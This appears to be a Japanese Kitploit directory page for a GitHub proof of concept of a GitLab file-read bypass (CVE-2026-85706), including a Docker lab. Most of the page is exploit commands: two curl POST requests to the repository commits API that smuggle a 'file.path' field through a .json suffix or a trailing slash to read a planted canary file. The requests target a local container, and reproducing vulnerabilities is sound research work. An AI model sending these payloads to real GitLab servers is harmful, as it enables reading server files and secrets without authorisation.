Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-85706_docker_exp — CVE-2026-85706 の Docker ベース再現環境および PoC。.json サフィックスと末尾スラッシュのパストリックによる GitLab LFI バイパスを実証します。 | Kitploit
ツール/GitHubGitHub/flowerwitch/cve-2026-85706_docker_exp
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストラボと実践
GitHubflowerwitch/cve-2026-85706_docker_exp

CVE-2026-85706_docker_exp

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-85706 の Docker ベース再現環境および PoC。.json サフィックスと末尾スラッシュのパストリックによる GitLab LFI バイパスを実証します。

リポジトリを見る
4時間25分前未レビュー

1. dockerの起動

root@kitploit:~
git clone  https://github.com/FlowerWitch/CVE-2026-85706_docker_exp
docker compose up -d
  1. LFIテスト情報の書き込み
root@kitploit:~
docker exec gitlab-vuln bash -c 'echo "SECRET-CANARY-85706-%%%" > /tmp/canary.txt'
  1. 読み取り検証
root@kitploit:~
# バイパス方法 1:.json サフィックス
curl -s -w "\nHTTP %{http_code}\n" -X POST "http://localhost:8085/api/v4/projects/1/repository/commits.json" \
  -H "Content-Type: application/json" \
  --data '{"file":"","file.path":"/tmp/canary.txt","file.size":1,"Content-Type":"application/x-www-form-urlencoded"}'

# バイパス方法 2:末尾スラッシュ
curl -s -w "\nHTTP %{http_code}\n" -X POST "http://localhost:8085/api/v4/projects/1/repository/commits/" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data 'file=&file.path=/tmp/canary.txt&file.size=1&Content-Type=application/x-www-form-urlencoded'
image
ツールをダウンロード